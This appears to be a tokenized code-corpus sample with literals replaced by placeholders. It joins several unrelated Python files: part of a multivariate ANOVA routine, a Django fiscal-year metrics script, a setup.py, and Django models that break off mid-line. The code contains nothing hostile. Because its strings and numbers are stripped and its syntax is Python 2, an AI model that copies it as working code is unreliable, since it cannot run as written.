<EOL> dummyval = - <NUM_LIT:1> <EOL> datavals = pstat . colex ( data , - <NUM_LIT:1> ) <EOL> while dummyval in datavals : <EOL> dummyval = dummyval - <NUM_LIT:1> <EOL> DA = N . ones ( Nlevels , '<STR_LIT:f>' ) * dummyval <EOL> if len ( Bscols ) == <NUM_LIT:1> : <EOL> subjslots = N . ones ( ( Nsubjects , <NUM_LIT:1> ) ) <EOL> else : <EOL> subjslots = N . zeros ( Nblevels ) <EOL> for i in range ( len ( data ) ) : <EOL> idx = [ ] <EOL> for j in range ( Nfactors + <NUM_LIT:1> ) : <EOL> new = alluniqueslist [ j ] . index ( data [ i ] [ j ] ) <EOL> idx . append ( new ) <EOL> DA [ idx ] = data [ i ] [ - <NUM_LIT:1> ] <EOL> btwidx = N . take ( idx , N . array ( Bscols ) ) <EOL> subjslots [ btwidx ] = <NUM_LIT:1> <EOL> dcount = - <NUM_LIT:1> <EOL> Bwsources = [ ] <EOL> Bwonly_sources = [ ] <EOL> D = N . zeros ( Nwsources , N . PyObject ) <EOL> DM = [ <NUM_LIT:0> ] * Nwsources <EOL> DN = [ <NUM_LIT:0> ] * Nwsources <EOL> for source in range ( <NUM_LIT:3> , Nallsources , <NUM_LIT:2> ) : <EOL> if ( ( source - <NUM_LIT:1> ) & Bwithins ) != <NUM_LIT:0> : <EOL> Bwsources . append ( source - <NUM_LIT:1> ) <EOL> if subset ( ( source - <NUM_LIT:1> ) , Bwithins ) : <EOL> dcount = dcount + <NUM_LIT:1> <EOL> Bwonly_sources . append ( source - <NUM_LIT:1> ) <EOL> dwsc = <NUM_LIT:1.0> * DA <EOL> Bnonsource = ( Nallsources - <NUM_LIT:1> ) & ~ source <EOL> Bwscols = makebin ( Wscols ) <EOL> Bwithinnonsource = Bnonsource & Bwscols <EOL> Lwithinnonsource = makelist ( Bwithinnonsource , Nfactors + <NUM_LIT:1> ) <EOL> for i in range ( len ( Lwithinnonsource ) - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> dwsc = amean ( dwsc , Lwithinnonsource [ i ] ) <EOL> mns = dwsc <EOL> Bwithinsource = source & Bwscols <EOL> Lwithinsourcecol = makelist ( Bwithinsource , Nfactors + <NUM_LIT:1> ) <EOL> Lsourceandbtws = makelist ( source | Bbetweens , Nfactors + <NUM_LIT:1> ) <EOL> if Lwithinnonsource < > [ ] : <EOL> Lwithinsourcecol = map ( Lsourceandbtws . index , Lwithinsourcecol ) <EOL> dvarshape = N . array ( N . take ( mns . shape , Lwithinsourcecol [ <NUM_LIT:1> : ] ) ) - <NUM_LIT:1> <EOL> idxarray = N . indices ( dvarshape ) <EOL> newshape = N . array ( [ idxarray . shape [ <NUM_LIT:0> ] , <EOL> N . multiply . reduce ( idxarray . shape [ <NUM_LIT:1> : ] ) ] ) <EOL> indxlist = N . swapaxes ( N . reshape ( idxarray , newshape ) , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> for i in range ( len ( indxlist ) ) : <EOL> coeffmatrix = N . ones ( mns . shape , N . Float ) <EOL> Wsourcecol = makelist ( Bwscols & source , Nfactors + <NUM_LIT:1> ) <EOL> for wfactor in range ( len ( Lwithinsourcecol [ <NUM_LIT:1> : ] ) ) : <EOL> coeffmatrix = N . swapaxes ( coeffmatrix , <NUM_LIT:0> , <EOL> Lwithinsourcecol [ wfactor + <NUM_LIT:1> ] ) <EOL> nlevels = coeffmatrix . shape [ <NUM_LIT:0> ] <EOL> try : <EOL> nextcoeff = coefflist [ nlevels - <NUM_LIT:1> ] [ indxlist [ i , wfactor ] ] <EOL> except IndexError : <EOL> raise IndexError , "<STR_LIT>" <EOL> for j in range ( nlevels ) : <EOL> coeffmatrix [ j ] = coeffmatrix [ j ] * nextcoeff [ j ] <EOL> coeffmatrix = N . swapaxes ( coeffmatrix , <NUM_LIT:0> , <EOL> Lwithinsourcecol [ wfactor + <NUM_LIT:1> ] ) <EOL> scratch = coeffmatrix * mns <EOL> for j in range ( len ( coeffmatrix . shape [ <NUM_LIT:1> : ] ) ) : <EOL> scratch = N . add . reduce ( scratch , <NUM_LIT:1> ) <EOL> if len ( scratch . shape ) == <NUM_LIT:1> : <EOL> scratch . shape = list ( scratch . shape ) + [ <NUM_LIT:1> ] <EOL> try : <EOL> tmp = D [ dcount ] . shape <EOL> D [ dcount ] = pstat . aabut ( D [ dcount ] , scratch ) <EOL> except AttributeError : <EOL> D [ dcount ] = scratch <EOL> variables = D [ dcount ] . shape [ <NUM_LIT:1> ] <EOL> tidx = range ( <NUM_LIT:1> , len ( subjslots . shape ) ) + [ <NUM_LIT:0> ] <EOL> tsubjslots = N . transpose ( subjslots , tidx ) <EOL> DMarray = N . zeros ( list ( tsubjslots . shape [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) + <EOL> [ variables ] , '<STR_LIT:f>' ) <EOL> DNarray = N . zeros ( list ( tsubjslots . shape [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) + <EOL> [ variables ] , '<STR_LIT:f>' ) <EOL> idx = [ <NUM_LIT:0> ] * len ( tsubjslots . shape [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) <EOL> idx [ <NUM_LIT:0> ] = - <NUM_LIT:1> <EOL> loopcap = N . array ( tsubjslots . shape [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) - <NUM_LIT:1> <EOL> while incr ( idx , loopcap ) < > - <NUM_LIT:1> : <EOL> DNarray [ idx ] = float ( asum ( tsubjslots [ idx ] ) ) <EOL> thismean = ( N . add . reduce ( tsubjslots [ idx ] * <EOL> N . transpose ( D [ dcount ] ) , <NUM_LIT:1> ) / <EOL> DNarray [ idx ] ) <EOL> thismean = N . array ( thismean , N . PyObject ) <EOL> DMarray [ idx ] = thismean <EOL> DM [ dcount ] = DMarray <EOL> DN [ dcount ] = DNarray <EOL> if Bscols [ <NUM_LIT:1> : ] < > [ ] : <EOL> BNs = pstat . colex ( [ Nlevels ] , Bscols [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> BNs = [ <NUM_LIT:1> ] <EOL> if ( ( source - <NUM_LIT:1> ) & Bwithins ) == <NUM_LIT:0> : <EOL> sourcecols = makelist ( source - <NUM_LIT:1> , Nfactors + <NUM_LIT:1> ) <EOL> Lsource = makelist ( ( Nallsources - <NUM_LIT:1> ) & Bbetweens , Nfactors + <NUM_LIT:1> ) <EOL> btwcols = map ( Bscols . index , Lsource ) <EOL> hn = aharmonicmean ( Narray , - <NUM_LIT:1> ) <EOL> SSw = <NUM_LIT:0.0> <EOL> idxlist = pstat . unique ( pstat . colex ( M , btwcols ) ) <EOL> for row in M : <EOL> idx = [ ] <EOL> for i in range ( len ( row [ : - <NUM_LIT:1> ] ) ) : <EOL> idx . append ( alluniqueslist [ Bscols [ i ] ] . index ( row [ i ] ) ) <EOL> idx = idx [ <NUM_LIT:1> : ] <EOL> newval = row [ - <NUM_LIT:1> ] - Marray [ idx ] <EOL> SSw = SSw + ( newval ) ** <NUM_LIT:2> <EOL> Lsource = makelist ( source - <NUM_LIT:1> , Nfactors + <NUM_LIT:1> ) <EOL> btwsourcecols = ( N . array ( map ( Bscols . index , Lsource ) ) - <NUM_LIT:1> ) . tolist ( ) <EOL> Bbtwnonsourcedims = ~ source & Bbetweens <EOL> Lbtwnonsourcedims = makelist ( Bbtwnonsourcedims , Nfactors + <NUM_LIT:1> ) <EOL> btwnonsourcedims = ( N . array ( map ( Bscols . index , Lbtwnonsourcedims ) ) - <NUM_LIT:1> ) . tolist ( ) <EOL> sourceMarray = amean ( Marray , btwnonsourcedims , <NUM_LIT:1> ) <EOL> sourceNarray = aharmonicmean ( Narray , btwnonsourcedims , <NUM_LIT:1> ) <EOL> ga = asum ( ( sourceMarray * sourceNarray ) / <EOL> asum ( sourceNarray ) ) <EOL> ga = N . reshape ( ga , N . ones ( len ( Marray . shape ) ) ) <EOL> if source == Nallsources - <NUM_LIT:1> : <EOL> sourceNarray = aharmonicmean ( Narray ) <EOL> sub_effects = <NUM_LIT:1.0> * ga <EOL> for subsource in range ( <NUM_LIT:3> , source , <NUM_LIT:2> ) : <EOL> if subset ( subsource - <NUM_LIT:1> , source - <NUM_LIT:1> ) : <EOL> sub_effects = ( sub_effects + <EOL> alleffects [ alleffsources . index ( subsource ) ] ) <EOL> effect = sourceMarray - sub_effects <EOL> alleffects . append ( effect ) <EOL> alleffsources . append ( source ) <EOL> SS = asum ( ( effect ** <NUM_LIT:2> * sourceNarray ) * <EOL> N . multiply . reduce ( N . take ( Marray . shape , btwnonsourcedims ) ) ) <EOL> SSlist . append ( SS ) <EOL> SSsources . append ( source ) <EOL> collapsed = pstat . collapse ( M , btwcols , - <NUM_LIT:1> , None , len , mean ) <EOL> contrastmns = pstat . collapse ( collapsed , btwsourcecols , - <NUM_LIT:2> , sterr , len , mean ) <EOL> contrastns = pstat . collapse ( collapsed , btwsourcecols , - <NUM_LIT:1> , None , None , <EOL> N . sum ) <EOL> contrasthns = pstat . collapse ( collapsed , btwsourcecols , - <NUM_LIT:1> , None , None , <EOL> harmonicmean ) <EOL> sourceNs = pstat . colex ( [ Nlevels ] , makelist ( source - <NUM_LIT:1> , Nfactors + <NUM_LIT:1> ) ) <EOL> dfnum = N . multiply . reduce ( N . ravel ( N . array ( sourceNs ) - <NUM_LIT:1> ) ) <EOL> dfden = Nsubjects - N . multiply . reduce ( N . ravel ( BNs ) ) <EOL> MS = SS / dfnum <EOL> MSw = SSw / dfden <EOL> if MSw < > <NUM_LIT:0> : <EOL> f = MS / MSw <EOL> else : <EOL> f = <NUM_LIT:0> <EOL> if f >= <NUM_LIT:0> : <EOL> prob = fprob ( dfnum , dfden , f ) <EOL> else : <EOL> prob = <NUM_LIT:1.0> <EOL> else : <EOL> sourcewithins = ( source - <NUM_LIT:1> ) & Bwithins <EOL> workD = D [ Bwonly_sources . index ( sourcewithins ) ] <EOL> if len ( workD . shape ) == <NUM_LIT:1> : <EOL> workD = workD [ : , N . NewAxis ] <EOL> if len ( subjslots . shape ) == <NUM_LIT:1> : <EOL> subjslots = subjslots [ : , N . NewAxis ] <EOL> ef = Dfull_model ( workD , subjslots ) <EOL> if subset ( ( source - <NUM_LIT:1> ) , Bwithins ) : <EOL> er = Drestrict_mean ( workD , subjslots ) <EOL> else : <EOL> er = Drestrict_source ( workD , subjslots , source ) + ef <EOL> SSw = LA . determinant ( ef ) <EOL> SS = LA . determinant ( er ) - SSw <EOL> sourceNs = pstat . colex ( [ Nlevels ] , makelist ( source , Nfactors + <NUM_LIT:1> ) ) <EOL> dfnum = N . multiply . reduce ( N . ravel ( N . array ( sourceNs ) - <NUM_LIT:1> ) [ <NUM_LIT:1> : ] ) <EOL> if subset ( source - <NUM_LIT:1> , Bwithins ) : <EOL> dfden = Nsubjects - N . multiply . reduce ( N . ravel ( BNs ) ) - dfnum + <NUM_LIT:1> <EOL> MS = SS / dfnum <EOL> MSw = SSw / dfden <EOL> if MSw < > <NUM_LIT:0> : <EOL> f = MS / MSw <EOL> else : <EOL> f = <NUM_LIT:0> <EOL> if f >= <NUM_LIT:0> : <EOL> prob = fprob ( dfnum , dfden , f ) <EOL> else : <EOL> prob = <NUM_LIT:1.0> <EOL> else : <EOL> try : <EOL> p = workD . shape [ <NUM_LIT:1> ] <EOL> except IndexError : <EOL> p = <NUM_LIT:1> <EOL> k = N . multiply . reduce ( N . ravel ( BNs ) ) <EOL> m = Nsubjects - <NUM_LIT:1> - ( p + k ) / <NUM_LIT> <EOL> d_en = float ( p ** <NUM_LIT:2> + ( k - <NUM_LIT:1> ) ** <NUM_LIT:2> - <NUM_LIT:5> ) <EOL> if d_en == <NUM_LIT:0.0> : <EOL> s = <NUM_LIT:1.0> <EOL> else : <EOL> s = math . sqrt ( ( ( p * ( k - <NUM_LIT:1> ) ) ** <NUM_LIT:2> - <NUM_LIT:4> ) / d_en ) <EOL> dfden = m * s - dfnum / <NUM_LIT> + <NUM_LIT:1> <EOL> if LA . determinant ( er ) < > <NUM_LIT:0> : <EOL> lmbda = LA . determinant ( ef ) / LA . determinant ( er ) <EOL> W = math . pow ( lmbda , ( <NUM_LIT:1.0> / s ) ) <EOL> f = ( ( <NUM_LIT:1.0> - W ) / W ) * ( dfden / dfnum ) <EOL> else : <EOL> f = <NUM_LIT:0> <EOL> if f >= <NUM_LIT:0> : <EOL> prob = fprob ( dfnum , dfden , f ) <EOL> else : <EOL> prob = <NUM_LIT:1.0> <EOL> suffix = '<STR_LIT>' <EOL> if prob < <NUM_LIT> : suffix = '<STR_LIT>' <EOL> elif prob < <NUM_LIT> : suffix = '<STR_LIT>' <EOL> elif prob < <NUM_LIT> : suffix = '<STR_LIT:*>' <EOL> adjsourcecols = N . array ( makelist ( source - <NUM_LIT:1> , Nfactors + <NUM_LIT:1> ) ) - <NUM_LIT:1> <EOL> thiseffect = '<STR_LIT>' <EOL> for col in adjsourcecols : <EOL> if len ( adjsourcecols ) > <NUM_LIT:1> : <EOL> thiseffect = thiseffect + effects [ col ] [ <NUM_LIT:0> ] <EOL> else : <EOL> thiseffect = thiseffect + ( effects [ col ] ) <EOL> outputlist = ( outputlist <EOL> + [ [ thiseffect , round4 ( SS ) , dfnum , <EOL> round4 ( SS / float ( dfnum ) ) , round4 ( f ) , <EOL> round4 ( prob ) , suffix ] ] <EOL> + [ [ thiseffect + '<STR_LIT>' , round4 ( SSw ) , dfden , <EOL> round4 ( SSw / float ( dfden ) ) , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ] <EOL> + [ [ '<STR_LIT:\n>' ] ] ) <EOL> Lsource = makelist ( source - <NUM_LIT:1> , Nfactors + <NUM_LIT:1> ) <EOL> collapsed = pstat . collapse ( cdata , Lsource , - <NUM_LIT:1> , sterr , len , mean ) <EOL> prefixcols = range ( len ( collapsed [ <NUM_LIT:0> ] [ : - <NUM_LIT:3> ] ) ) <EOL> outlist = pstat . colex ( collapsed , prefixcols ) <EOL> eff = [ ] <EOL> for col in Lsource : <EOL> eff . append ( effects [ col - <NUM_LIT:1> ] ) <EOL> for item in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:N>' ] : <EOL> eff . append ( item ) <EOL> outlist = pstat . abut ( outlist , <EOL> map ( round4 , pstat . colex ( collapsed , - <NUM_LIT:3> ) ) , <EOL> map ( round4 , pstat . colex ( collapsed , - <NUM_LIT:2> ) ) , <EOL> map ( round4 , pstat . colex ( collapsed , - <NUM_LIT:1> ) ) ) <EOL> outlist = [ eff ] + outlist <EOL> pstat . printcc ( outlist ) <EOL> print <EOL> print <EOL> title = [ [ '<STR_LIT>' , '<STR_LIT>' ] + effects [ : Nfactors ] ] <EOL> title = title + [ [ '<STR_LIT>' ] + Nlevels ] <EOL> facttypes = [ '<STR_LIT>' ] * Nfactors <EOL> for i in range ( len ( Wscols [ <NUM_LIT:1> : ] ) ) : <EOL> facttypes [ Wscols [ i + <NUM_LIT:1> ] - <NUM_LIT:1> ] = '<STR_LIT>' <EOL> title = title + [ [ '<STR_LIT>' , '<STR_LIT>' ] + facttypes ] <EOL> pstat . printcc ( title ) <EOL> print <EOL> title = [ [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:F>' , '<STR_LIT:p>' , '<STR_LIT>' ] ] + [ '<STR_LIT>' ] <EOL> outputlist = title + outputlist <EOL> pstat . printcc ( outputlist ) <EOL> return <EOL> def Dfull_model ( workd , subjslots ) : <EOL> """<STR_LIT>""" <EOL> workd = subtr_cellmeans ( workd , subjslots ) <EOL> sserr = multivar_SScalc ( workd ) <EOL> return sserr <EOL> def Drestrict_mean ( workd , subjslots ) : <EOL> """<STR_LIT>""" <EOL> errors = subtr_cellmeans ( workd , subjslots ) <EOL> grandDmeans = amean ( workd , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> errors = errors + N . transpose ( grandDmeans ) <EOL> sserr = multivar_SScalc ( errors ) <EOL> return sserr <EOL> def Drestrict_source ( workd , subjslots , source ) : <EOL> """<STR_LIT>""" <EOL> if source > <NUM_LIT:0> : <EOL> sourcewithins = ( source - <NUM_LIT:1> ) & Bwithins <EOL> sourcebetweens = ( source - <NUM_LIT:1> ) & Bbetweens <EOL> dindex = Bwonly_sources . index ( sourcewithins ) <EOL> all_cellmeans = N . transpose ( DM [ dindex ] , [ - <NUM_LIT:1> ] + range ( <NUM_LIT:0> , len ( DM [ dindex ] . shape ) - <NUM_LIT:1> ) ) <EOL> all_cellns = N . transpose ( DN [ dindex ] , [ - <NUM_LIT:1> ] + range ( <NUM_LIT:0> , len ( DN [ dindex ] . shape ) - <NUM_LIT:1> ) ) <EOL> hn = aharmonicmean ( all_cellns ) <EOL> levels = D [ dindex ] . shape [ <NUM_LIT:1> ] <EOL> SSm = N . zeros ( ( levels , levels ) , '<STR_LIT:f>' ) <EOL> tworkd = N . transpose ( D [ dindex ] ) <EOL> RSw = N . zeros ( ( levels , levels ) , '<STR_LIT:f>' ) <EOL> RSinter = N . zeros ( ( levels , levels ) , N . PyObject ) <EOL> for i in range ( levels ) : <EOL> for j in range ( i , levels ) : <EOL> RSw [ i , j ] = RSw [ j , i ] = N . sum ( tworkd [ i ] * tworkd [ j ] ) <EOL> cross = all_cellmeans [ i ] * all_cellmeans [ j ] <EOL> multfirst = asum ( cross * all_cellns [ i ] ) <EOL> RSinter [ i , j ] = RSinter [ j , i ] = N . asarray ( multfirst ) <EOL> SSm [ i , j ] = SSm [ j , i ] = ( amean ( all_cellmeans [ i ] ) * <EOL> amean ( all_cellmeans [ j ] ) * <EOL> len ( all_cellmeans [ i ] ) * hn ) <EOL> SSw = RSw - RSinter <EOL> Lsource = makelist ( sourcebetweens , Nfactors + <NUM_LIT:1> ) <EOL> btwsourcecols = ( N . array ( map ( Bscols . index , Lsource ) ) - <NUM_LIT:1> ) . tolist ( ) <EOL> Bbtwnonsourcedims = ~ source & Bbetweens <EOL> Lbtwnonsourcedims = makelist ( Bbtwnonsourcedims , Nfactors + <NUM_LIT:1> ) <EOL> btwnonsourcedims = ( N . array ( map ( Bscols . index , Lbtwnonsourcedims ) ) - <NUM_LIT:1> ) . tolist ( ) <EOL> sourceDMarray = DM [ dindex ] * <NUM_LIT:1.0> <EOL> for dim in btwnonsourcedims : <EOL> if dim == len ( DM [ dindex ] . shape ) - <NUM_LIT:1> : <EOL> raise ValueError , "<STR_LIT>" <EOL> sourceDMarray = amean ( sourceDMarray , dim , <NUM_LIT:1> ) <EOL> sourceDNarray = aharmonicmean ( DN [ dindex ] , btwnonsourcedims , <NUM_LIT:1> ) <EOL> variableNs = asum ( sourceDNarray , <EOL> range ( len ( sourceDMarray . shape ) - <NUM_LIT:1> ) ) <EOL> ga = asum ( ( sourceDMarray * sourceDNarray ) / <EOL> variableNs , <EOL> range ( len ( sourceDMarray . shape ) - <NUM_LIT:1> ) , <NUM_LIT:1> ) <EOL> if source == Nallsources - <NUM_LIT:1> : <EOL> sourceDNarray = aharmonicmean ( DN [ dindex ] , <EOL> range ( len ( sourceDMarray . shape ) - <NUM_LIT:1> ) ) <EOL> sub_effects = ga * <NUM_LIT:1.0> <EOL> for subsource in range ( <NUM_LIT:3> , source - <NUM_LIT:2> , <NUM_LIT:2> ) : <EOL> subsourcebtw = ( subsource - <NUM_LIT:1> ) & Bbetweens <EOL> if ( propersubset ( subsource - <NUM_LIT:1> , source - <NUM_LIT:1> ) and <EOL> ( subsource - <NUM_LIT:1> ) & Bwithins == ( source - <NUM_LIT:1> ) & Bwithins and <EOL> ( subsource - <NUM_LIT:1> ) < > ( source - <NUM_LIT:1> ) & Bwithins ) : <EOL> sub_effects = ( sub_effects + <EOL> alleffects [ alleffsources . index ( subsource ) ] ) <EOL> effect = sourceDMarray - sub_effects <EOL> alleffects . append ( effect ) <EOL> alleffsources . append ( source ) <EOL> SS = N . zeros ( ( levels , levels ) , '<STR_LIT:f>' ) <EOL> SS = asum ( ( effect ** <NUM_LIT:2> * sourceDNarray ) * <EOL> N . multiply . reduce ( N . take ( DM [ dindex ] . shape , btwnonsourcedims ) ) , <EOL> range ( len ( sourceDMarray . shape ) - <NUM_LIT:1> ) ) <EOL> SSlist . append ( SS ) <EOL> SSsources . append ( source ) <EOL> return SS <EOL> def multivar_SScalc ( workd ) : <EOL> if len ( workd . shape ) == <NUM_LIT:1> : <EOL> levels = <NUM_LIT:1> <EOL> else : <EOL> levels = workd . shape [ <NUM_LIT:0> ] <EOL> sserr = N . zeros ( ( levels , levels ) , '<STR_LIT:f>' ) <EOL> for i in range ( levels ) : <EOL> for j in range ( i , levels ) : <EOL> ssval = N . add . reduce ( workd [ i ] * workd [ j ] ) <EOL> sserr [ i , j ] = ssval <EOL> sserr [ j , i ] = ssval <EOL> return sserr <EOL> def subtr_cellmeans ( workd , subjslots ) : <EOL> """<STR_LIT>""" <EOL> sourcedims = makelist ( Bbetweens , Nfactors + <NUM_LIT:1> ) <EOL> transidx = range ( len ( subjslots . shape ) ) [ <NUM_LIT:1> : ] + [ <NUM_LIT:0> ] <EOL> tsubjslots = N . transpose ( subjslots , transidx ) <EOL> tworkd = N . transpose ( workd ) <EOL> errors = <NUM_LIT:1.0> * tworkd <EOL> if len ( sourcedims ) == <NUM_LIT:0> : <EOL> idx = [ - <NUM_LIT:1> ] <EOL> loopcap = [ <NUM_LIT:0> ] <EOL> if len ( sourcedims ) < > <NUM_LIT:0> : <EOL> btwsourcedims = map ( Bscols . index , sourcedims ) <EOL> idx = [ <NUM_LIT:0> ] * len ( btwsourcedims ) <EOL> idx [ <NUM_LIT:0> ] = - <NUM_LIT:1> <EOL> loopcap = N . take ( N . array ( Nlevels ) , sourcedims ) - <NUM_LIT:1> <EOL> while incr ( idx , loopcap ) < > - <NUM_LIT:1> : <EOL> mask = tsubjslots [ idx ] <EOL> thisgroup = tworkd * mask [ N . NewAxis , : ] <EOL> groupmns = amean ( N . compress ( mask , thisgroup ) , <NUM_LIT:1> ) <EOL> errors = errors - N . multiply . outer ( groupmns , mask ) <EOL> return errors <EOL> def F_value_wilks_lambda ( ER , EF , dfnum , dfden , a , b ) : <EOL> """<STR_LIT>""" <EOL> if type ( ER ) in [ IntType , FloatType ] : <EOL> ER = N . array ( [ [ ER ] ] ) <EOL> if type ( EF ) in [ IntType , FloatType ] : <EOL> EF = N . array ( [ [ EF ] ] ) <EOL> lmbda = LA . determinant ( EF ) / LA . determinant ( ER ) <EOL> if ( a - <NUM_LIT:1> ) ** <NUM_LIT:2> + ( b - <NUM_LIT:1> ) ** <NUM_LIT:2> == <NUM_LIT:5> : <EOL> q = <NUM_LIT:1> <EOL> else : <EOL> q = math . sqrt ( ( ( a - <NUM_LIT:1> ) ** <NUM_LIT:2> * ( b - <NUM_LIT:1> ) ** <NUM_LIT:2> - <NUM_LIT:2> ) / ( ( a - <NUM_LIT:1> ) ** <NUM_LIT:2> + ( b - <NUM_LIT:1> ) ** <NUM_LIT:2> - <NUM_LIT:5> ) ) <EOL> n_um = ( <NUM_LIT:1> - lmbda ** ( <NUM_LIT:1.0> / q ) ) * ( a - <NUM_LIT:1> ) * ( b - <NUM_LIT:1> ) <EOL> d_en = lmbda ** ( <NUM_LIT:1.0> / q ) / ( m * q - <NUM_LIT:0.5> * ( a - <NUM_LIT:1> ) * ( b - <NUM_LIT:1> ) + <NUM_LIT:1> ) <EOL> return n_um / d_en <EOL> def member ( factor , source ) : <EOL> return ( <NUM_LIT:1> << factor ) & source != <NUM_LIT:0> <EOL> def setsize ( source ) : <EOL> size = <NUM_LIT:0> <EOL> for bit in source : <EOL> if bit == <NUM_LIT:1> : <EOL> size = size + <NUM_LIT:1> <EOL> return size <EOL> def subset ( a , b ) : <EOL> return ( a & b ) == a <EOL> def propersubset ( a , b ) : <EOL> sub = ( ( a & b ) == a ) <EOL> if a == b : <EOL> sub = <NUM_LIT:0> <EOL> return sub <EOL> def numlevels ( source , Nlevels ) : <EOL> for i in range ( <NUM_LIT:30> ) : <EOL> if <NUM_LIT:1> << i >= source : <EOL> break <EOL> levelcount = <NUM_LIT:1> <EOL> for j in range ( i ) : <EOL> if subset ( <NUM_LIT:1> << j , source ) : <EOL> levelcount = levelcount * Nlevels [ j ] - <NUM_LIT:1> <EOL> return levelcount <EOL> def numbitson ( a ) : <EOL> numon = <NUM_LIT:0> <EOL> while a > <NUM_LIT:0> : <EOL> numon = numon + a % <NUM_LIT:2> <EOL> a = a >> <NUM_LIT:1> <EOL> return numon <EOL> def makebin ( sourcelist ) : <EOL> outbin = <NUM_LIT:0> <EOL> for item in sourcelist : <EOL> outbin = outbin + <NUM_LIT:2> ** item <EOL> return outbin <EOL> def makelist ( source , ncols ) : <EOL> levellist = [ ] <EOL> for j in range ( ncols ) : <EOL> if subset ( <NUM_LIT:1> << j , source ) : <EOL> levellist . append ( j ) <EOL> return levellist <EOL> def round4 ( num ) : <EOL> try : <EOL> return round ( num , <NUM_LIT:4> ) <EOL> except : <EOL> return '<STR_LIT>' </s>
<s> from django . db . models import Sum <EOL> from numpy import mean , std <EOL> from metrics . models import ProgramTimeliness , AgencyTimeliness , USASpendingAggregate <EOL> from utils import pretty_money <EOL> from settings import FISCAL_YEARS <EOL> print "<STR_LIT>" <EOL> for fy in FISCAL_YEARS : <EOL> timeliness_sum = ProgramTimeliness . objects . filter ( fiscal_year = fy ) . aggregate ( Sum ( '<STR_LIT>' ) ) [ '<STR_LIT>' ] <EOL> usaspending_sum = USASpendingAggregate . objects . get ( fiscal_year = fy ) . total_federal_funding <EOL> sample_pct = timeliness_sum * <NUM_LIT:100> / usaspending_sum <EOL> print "<STR_LIT>" % ( fy , round ( sample_pct , <NUM_LIT:2> ) , <EOL> pretty_money ( timeliness_sum ) , <EOL> pretty_money ( usaspending_sum ) ) <EOL> print "<STR_LIT>" <EOL> for fy in FISCAL_YEARS : <EOL> lag_values = [ pt . avg_lag_rows for pt in ProgramTimeliness . objects . filter ( fiscal_year = fy ) ] <EOL> print "<STR_LIT>" % ( fy , mean ( lag_values ) , std ( lag_values ) ) <EOL> print "<STR_LIT>" <EOL> for fy in FISCAL_YEARS : <EOL> lag_values = [ at . avg_lag_rows for at in AgencyTimeliness . objects . filter ( fiscal_year = fy ) ] <EOL> print "<STR_LIT>" % ( fy , mean ( lag_values ) , std ( lag_values ) ) </s>
<s> from mediasync import __version__ <EOL> from setuptools import setup , find_packages <EOL> import os <EOL> f = open ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) <EOL> readme = f . read ( ) <EOL> f . close ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = __version__ , <EOL> description = '<STR_LIT>' , <EOL> long_description = readme , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> package_data = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> } , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> license = '<STR_LIT>' , <EOL> platforms = [ "<STR_LIT>" ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from django . db import models <EOL> from django . contrib . auth . models import User <EOL> from postgres . fields import JSONField <EOL> from django . contrib . postgres . fields import ArrayField <EOL> from django . dispatch import receiver <EOL> from django . db . models . signals import pre_delete , post_save <EOL> class Session ( models . Model ) : <EOL> user = models . ForeignKey ( User ) <EOL> start = models . DateTimeField ( auto_now_add = True ) <EOL> @ classmethod <EOL> def current_for_user ( kls , user ) : <EOL> sessions = list ( kls . objects . filter ( user = user ) . order_by ( '<STR_LIT>' ) [ : <NUM_LIT:1> ] ) <EOL> if sessions : <EOL> sess = sessions [ <NUM_LIT:0> ] <EOL> else : <EOL> sess = kls ( user = user ) <EOL> sess . save ( ) <EOL> return sess <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . user . username , self . start . date ( ) . isoformat ( ) ) <EOL> class Meta : <EOL> index_together = ( ( '<STR_LIT:user>' , '<STR_LIT:start>' ) ) <EOL> class Firm ( models . Model ) : <EOL> name = models . TextField ( ) <EOL> domain = models . TextField ( ) <EOL> count = models . PositiveIntegerField ( ) <EOL> external_id = models . TextField ( blank = True ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> FLAG_TYPE_CHOICES = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> class Flag ( models . Model ) : <EOL> firm = models . ForeignKey ( Firm ) <EOL> session = models . ForeignKey ( Session ) <EOL> type = models . CharField ( choices = FLAG_TYPE_CHOICES , max_length = <NUM_LIT:32> ) <EOL> resolved = models . BooleanField ( default = False ) <EOL> notes = models . TextField ( blank = True ) <EOL> created = models . DateTimeField ( auto_now_add = True ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( "<STR_LIT>" if not self . resolved else "<STR_LIT>" , self . type , self . firm . domain , self . created . isoformat ( ) ) <EOL> class BioPage ( models . Model ) : <EOL> firm = models . ForeignKey ( Firm ) <EOL> session = models . ForeignKey ( Session ) <EOL> url = models . URLField ( ) <EOL> data = JSONField ( ) <EOL> created = models . DateTimeField ( auto_now_add = True ) <EOL> def __str__ ( self ) : <EOL> url = self . url if len ( self . url ) < <NUM_LIT:30> else 